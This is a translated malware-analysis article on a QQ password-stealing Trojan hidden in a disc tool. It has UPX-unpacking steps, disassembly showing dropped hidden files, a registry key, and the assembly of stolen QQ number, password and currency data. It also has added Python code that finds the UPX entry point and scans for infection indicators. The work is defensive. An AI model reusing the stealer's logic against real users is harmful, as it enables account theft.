Analysis of the QQ-stealing Trojan ("QQ Black Hand") found on the Hacker Defense disc

Source: Internet
Author: User

I saw in Hacker Defense's official announcement that, among the six strongest files in this month's disc column, the tool from the DvBBS (dynamic network) vulnerability exploitation animation makes antivirus software raise an alarm, reporting Trojan-PSW.Win32.QQShou.ed. I thought: there is someone even blacker than me. It seems ...... So I analyzed this malicious program, both to build up my experience in manual virus removal and to help friends who have been hit clean it up.
First a PEiD scan for the packer: UPX 0.89.6-1.02 / 1.05-1.24 -> Markus & Laszlo [Overlay]. There are any number of UPX unpackers on the Internet, so I won't dwell on that; the UPX fileinfo plug-in of PEiD gives you the OEP of a UPX-packed program straight away.

The OEP here is 4056D8. Load the file directly in OD, press F4 to run to 4056D8 and dump it there. Unpacking done. Run PEiD again and it now says Borland Delphi 6.0-7.0. After unpacking you could repair the import table, but we are not going to run it anyway.
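To show where that OEP value comes from when you do not have the PEiD plug-in at hand, here is an added example (my own code, neither from the article nor from the PEiD plug-in) that parses the PE section table with the Python standard library only, checks for the UPX0/UPX1 section names and scans the entry-point section for the closing `popad; jmp rel32` of the UPX stub, whose jump target is the original entry point. The input is a constructed, minimal PE32 built by `build_sample_pe()`: its section layout, names and flags are assumptions, and its jump is aimed at 0x4056D8 purely to reproduce the value found above.

```python
import struct

PE32_MAGIC = 0x10B
SECTION_HEADER = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes


def parse_pe(data):
    """Decode the few PE32 header fields this needs: image base, entry-point
    RVA and the section table (name, VirtualAddress, VirtualSize,
    PointerToRawData, SizeOfRawData)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != PE32_MAGIC:
        raise ValueError("only PE32 (32-bit) images are handled")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]   # AddressOfEntryPoint
    image_base = struct.unpack_from("<I", data, opt + 28)[0]  # ImageBase
    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"),
                         "va": va, "vsize": vsize, "raw": rawptr, "rawsize": rawsize})
    return image_base, entry_rva, sections


def section_for_rva(sections, rva):
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s
    return None


def looks_like_upx(sections):
    """UPX leaves its section names in place unless someone renamed them."""
    return any(s["name"].startswith("UPX") for s in sections)


def find_upx_oep(data):
    """Find the tail of the UPX decompression stub, popad; jmp rel32
    (bytes 61 E9 xx xx xx xx), inside the section that holds the entry point
    and return the absolute address it jumps to, i.e. the original entry point."""
    image_base, entry_rva, sections = parse_pe(data)
    entry_sec = section_for_rva(sections, entry_rva)
    if entry_sec is None:
        return None
    start = entry_sec["raw"] + (entry_rva - entry_sec["va"])
    end = entry_sec["raw"] + entry_sec["rawsize"]
    pos = data.find(b"\x61\xE9", start, end)
    while pos != -1 and pos + 6 <= end:
        rel = struct.unpack_from("<i", data, pos + 2)[0]
        next_rva = entry_sec["va"] + (pos + 6 - entry_sec["raw"])
        target_rva = (next_rva + rel) & 0xFFFFFFFF
        # The real stub jumps out of UPX1 back into the unpacked code in UPX0;
        # a 61 E9 whose target stays inside the stub section is a byte coincidence.
        target_sec = section_for_rva(sections, target_rva)
        if target_sec is not None and target_sec is not entry_sec:
            return image_base + target_rva
        pos = data.find(b"\x61\xE9", pos + 1, end)
    return None


def build_sample_pe():
    """Constructed input, not the Trojan: a minimal PE32 shaped like UPX output.
    UPX0 is an empty (uninitialised) section, UPX1 holds a fake stub
    'pushad; nops; popad; jmp' and is the entry point. The jmp is aimed at
    0x4056D8 only to reproduce the OEP the article found."""
    image_base, oep = 0x400000, 0x4056D8
    upx0_va, upx1_va, raw_ptr, raw_size = 0x1000, 0x8000, 0x400, 0x200
    stub = b"\x60" + b"\x90" * 16 + b"\x61\xE9"                   # pushad ... popad; jmp rel32
    rel = (oep - image_base) - (upx1_va + len(stub) + 4)            # rel32 counts from the end of the jmp
    stub += struct.pack("<i", rel)
    stub += b"\x00" * (raw_size - len(stub))

    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                         # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x102)  # i386, 2 sections, PE32 optional header
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 16, upx1_va)                        # AddressOfEntryPoint -> start of UPX1
    struct.pack_into("<I", opt, 28, image_base)
    sec_upx0 = struct.pack(SECTION_HEADER, b"UPX0", upx1_va - upx0_va, upx0_va, 0, raw_ptr, 0, 0, 0, 0, 0xE0000080)
    sec_upx1 = struct.pack(SECTION_HEADER, b"UPX1", 0x1000, upx1_va, raw_size, raw_ptr, 0, 0, 0, 0, 0xE0000040)
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sec_upx0 + sec_upx1
    return headers + b"\x00" * (raw_ptr - len(headers)) + stub


if __name__ == "__main__":
    sample = build_sample_pe()
    _, _, secs = parse_pe(sample)
    print("sections:", [s["name"] for s in secs], "UPX-like:", looks_like_upx(secs))
    print("OEP: %#x" % find_upx_oep(sample))
```

On a real sample the address returned is the one you reach in OD by stepping to the `jmp` after `popad`, which is where the dump is taken. A modified stub (tail relocated, `jmp` replaced by a `push`/`ret`) defeats the byte pattern, so treat a `None` result as "check by hand in the debugger", not as "not UPX".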
Now load the unpacked program in OD and analyze it.
00404935  50               PUSH EAX
00404936  E8 71FCFFFF      CALL <JMP.&kernel32.GetSystemDirectoryA>  // returns the Windows system directory path into the buffer at [EBP-100]
0040493B  85C0             TEST EAX,EAX
0040493D  75 07            JNZ SHORT 2.00404946                      // non-zero return = call succeeded
0040493F  C685 00FFFFFF 43 MOV BYTE PTR SS:[EBP-100],43              // on failure use 'C'
00404946  8A85 00FFFFFF    MOV AL,BYTE PTR SS:[EBP-100]              // first character of the path = drive letter
0040494C  50               PUSH EAX
0040494D  E8 E2FCFFFF      CALL <JMP.&user32.IsCharAlphaA>           // is that character a letter?
00404952  83F8 01          CMP EAX,1
00404955  1BC0             SBB EAX,EAX
00404957  40               INC EAX                                   // CMP/SBB/INC: EAX = 1 if IsCharAlphaA returned non-zero, else 0
00404958  84C0             TEST AL,AL
0040495A  75 07            JNZ SHORT 2.00404963
0040495C  C685 00FFFFFF 43 MOV BYTE PTR SS:[EBP-100],43              // not a letter: fall back to hex 43 = 'C', drive C:
00404963  8D85 FCFEFFFF    LEA EAX,DWORD PTR SS:[EBP-104]
00404969  8A95 00FFFFFF    MOV DL,BYTE PTR SS:[EBP-100]
0040496F  E8 CCEDFFFF      CALL 2.00403740                           // builds a string from the drive letter in DL
00404974  8B95 FCFEFFFF    MOV EDX,DWORD PTR SS:[EBP-104]
0040497A  8BC3             MOV EAX,EBX
0040497C  B9 B4494000      MOV ECX,2.004049B4                        // ASCII ":\Program Files\Internet Explorer\PLUGINS"
00404981  E8 2EEEFFFF      CALL 2.004037B4                           // concatenates drive letter + fixed path
00404986  33C0             XOR EAX,EAX
00404988  5A               POP EDX
00404989  59               POP ECX
0040498A  59               POP ECX
So the first thing the program does after starting is to work out where to drop its files. It does not use the system directory itself: it takes the drive letter from the Windows system directory path (falling back to C if GetSystemDirectoryA fails or the first character is not a letter) and appends a fixed path, which on a normal machine gives:
C:\Program Files\Internet Explorer\PLUGINS
In that folder you will find two extra files: bow.sys, which is a dynamic link library despite its extension, and a second file with a .bak extension. How do you tell that these two were created by the Trojan? Look at the file creation dates and they stand out from the rest.
Note that these files have the hidden attribute set; you must configure the folder options to show all files before you can see them.
Let's look at the contents of bow.sys:
003E4E1A |. 50               PUSH EAX                              ; /pDisposition
003E4E1B |. 8D4424 04        LEA EAX,DWORD PTR SS:[ESP+4]          ; |
003E4E1F |. 50               PUSH EAX                              ; |pHandle
003E4E20 |. 6A 00            PUSH 0                                ; |pSecurity = NULL
003E4E22 |. 68 3F000F00      PUSH 0F003F                           ; |Access = KEY_ALL_ACCESS
003E4E27 |. 6A 00            PUSH 0                                ; |Options = REG_OPTION_NON_VOLATILE
003E4E29 |. 6A 00            PUSH 0                                ; |Class = NULL
003E4E2B |. 6A 00            PUSH 0                                ; |Reserved = 0
003E4E2D |. 68 744E3E00      PUSH bow.003E4E74                     ; |Subkey = "Software\Ms\QQGuiShou"
003E4E32 |. 68 01000080      PUSH 80000001                         ; |hKey = HKEY_CURRENT_USER
003E4E37 |. E8 54F4FFFF      CALL <JMP.&advapi32.RegCreateKeyExA>  ; \RegCreateKeyExA
It creates (or, if it already exists, opens with KEY_ALL_ACCESS) the registry key
HKEY_CURRENT_USER\Software\Ms\QQGuiShou
Isn't "QQGuiShou" just the pinyin for "QQ Ghost Hand"? A Google search confirms that it is indeed a piece of QQ-stealing software.
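For friends who have been hit and want to check a machine, here is an added example (my own code, not the author's tool and not code from the Trojan) that turns the two indicators from the listings above into a check: it derives the drop folder the same way the disassembly does (drive letter of the system directory, with the 'C' fallback), flags hidden files in that folder that are newer than everything visible in it, and looks for the HKCU\Software\Ms\QQGuiShou key. The directory listing it runs on by default is constructed: the legitimate plug-in names and all dates are made up, and the second hidden file is called bow.bak on the assumption that the .bak file shares the bow prefix.

```python
import os
import sys
from datetime import datetime, timedelta

# Suffix read from the string at 004049B4 in the listing above; the Trojan
# prepends the drive letter it derived from the system directory.
PLUGIN_SUBPATH = r":\Program Files\Internet Explorer\PLUGINS"
DROPPED_NAME = "bow.sys"
# Subkey pushed to RegCreateKeyExA in bow.sys.
REG_SUBKEY = r"Software\Ms\QQGuiShou"
FILE_ATTRIBUTE_HIDDEN = 0x2


def derive_drop_path(system_dir):
    """Same decision as 00404936-00404981: first character of the system
    directory path; 'C' if GetSystemDirectoryA failed (empty string here)
    or the character is not a letter. str.isalpha stands in for
    IsCharAlphaA, which is locale-aware; for ASCII drive letters it agrees."""
    drive = system_dir[:1] if system_dir else "C"
    if not drive.isalpha():
        drive = "C"
    return drive + PLUGIN_SUBPATH


def suspicious_files(records):
    """records: dicts with name, hidden (bool) and created (datetime).
    Flags the known dropped name, and any hidden file created later than
    every visible file in the folder: the article's 'look at the creation
    date' test made mechanical."""
    visible = [r["created"] for r in records if not r["hidden"]]
    newest_visible = max(visible) if visible else None
    hits = []
    for r in records:
        reasons = []
        if r["name"].lower() == DROPPED_NAME:
            reasons.append("matches dropped file name")
        if r["hidden"] and (newest_visible is None or r["created"] > newest_visible):
            reasons.append("hidden and newer than every visible file")
        if reasons:
            hits.append((r["name"], reasons))
    return hits


def scan_directory(path):
    """Build records from a real folder. Windows exposes the hidden attribute
    through st_file_attributes and st_ctime is the creation time there; on
    other platforms hidden is always False and st_ctime is the inode change time."""
    records = []
    with os.scandir(path) as entries:
        for entry in entries:
            if not entry.is_file():
                continue
            st = entry.stat()
            attrs = getattr(st, "st_file_attributes", 0)
            records.append({"name": entry.name,
                            "hidden": bool(attrs & FILE_ATTRIBUTE_HIDDEN),
                            "created": datetime.fromtimestamp(st.st_ctime)})
    return records


def registry_key_present():
    """True/False on Windows, None elsewhere (winreg only exists on Windows)."""
    if sys.platform != "win32":
        return None
    import winreg
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, REG_SUBKEY):
            return True
    except OSError:
        return False


def sample_records():
    """Constructed listing of the PLUGINS folder: two plug-in files that were
    there before (names and dates made up) and the two hidden files the
    article describes; 'bow.bak' is an assumed name for the .bak file."""
    base = datetime(2007, 3, 1, 10, 0)
    return [
        {"name": "nppdf32.dll", "hidden": False, "created": base},
        {"name": "npqtplugin.dll", "hidden": False, "created": base + timedelta(days=2)},
        {"name": "bow.sys", "hidden": True, "created": base + timedelta(days=40)},
        {"name": "bow.bak", "hidden": True, "created": base + timedelta(days=40)},
    ]


if __name__ == "__main__":
    # SystemRoot (e.g. C:\WINDOWS) stands in for GetSystemDirectoryA; only the
    # first character matters. Off Windows it is unset and the sample listing is used.
    folder = derive_drop_path(os.environ.get("SystemRoot", ""))
    print("expected drop folder:", folder)
    records = scan_directory(folder) if os.path.isdir(folder) else sample_records()
    for name, reasons in suspicious_files(records):
        print(name, "->", "; ".join(reasons))
    print("registry key present:", registry_key_present())
```

The date test only works because the genuine plug-ins were installed long before the infection; on a freshly installed machine compare against the Windows installation date instead. Treat a hit as a reason to look at the file, not as proof by itself, and delete nothing the file-name check and the date check do not both point at.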
Continuing the analysis:
:00407715 A124A14000       mov eax, dword ptr [0040A124]
:0040771A 8B4018           mov eax, dword ptr [eax+18]
:0040771D 50               push eax
:0040771E A124A14000       mov eax, dword ptr [0040A124]
:00407723 8B4014           mov eax, dword ptr [eax+14]
:00407726 50               push eax
* Possible StringData Ref from Code Obj ->"QQ shock wave gives you a gift --> ("
:00407727 68947A4000       push 00407A94
:0040772C FF75F8           push [ebp-08]
* Possible StringData Ref from Code Obj ->"----"
:0040772F 68B87A4000       push 00407AB8
:00407734 FF75F4           push [ebp-0C]
:00407737 68C87A4000       push 00407AC8
:0040773C 8D45CC           lea eax, dword ptr [ebp-34]
:0040773F BA05000000       mov edx, 00000005
:00407744 E853BDFFFF       call 0040349C
:00407749 8B45CC           mov eax, dword ptr [ebp-34]
:0040774C 50               push eax
* Possible StringData Ref from Code Obj ->"number :"
:0040774D 68D47A4000       push 00407AD4
:00407752 FF75F8           push [ebp-08]
* Possible StringData Ref from Code Obj ->"---- password :"
:00407755 68E47A4000       push 00407AE4
:0040775A FF75F4           push [ebp-0C]
* Possible StringData Ref from Code Obj ->"---- available game currency :"
:0040775D 68F87A4000       push 00407AF8
:00407762 8D55C4           lea edx, dword ptr [ebp-3C]
:00407765 8B45DC           mov eax, dword ptr [ebp-24]
:00407768 E8E7D7FFFF       call 00404F54
:0040776D FF75C4           push [ebp-3C]
* Possible StringData Ref from Code Obj ->"---- saved :"
:00407770 68147B4000       push 00407B14
:00407775 8D55C0           lea edx, dword ptr [ebp-40]
:00407778 8B45E0           (the listing is cut off here in the source)
The string references give away what is being assembled: the victim's QQ number, password and game-currency balance are glued into a single text report, headed "QQ shock wave gives you a gift". Five values are pushed and then `mov edx, 5` precedes the call at 0040349C, which is the pattern Delphi emits for concatenating a counted list of strings; the result at [ebp-34] is then pushed as one piece of a larger concatenation. The listing ends here in the original, so the code that sends the report is not shown.
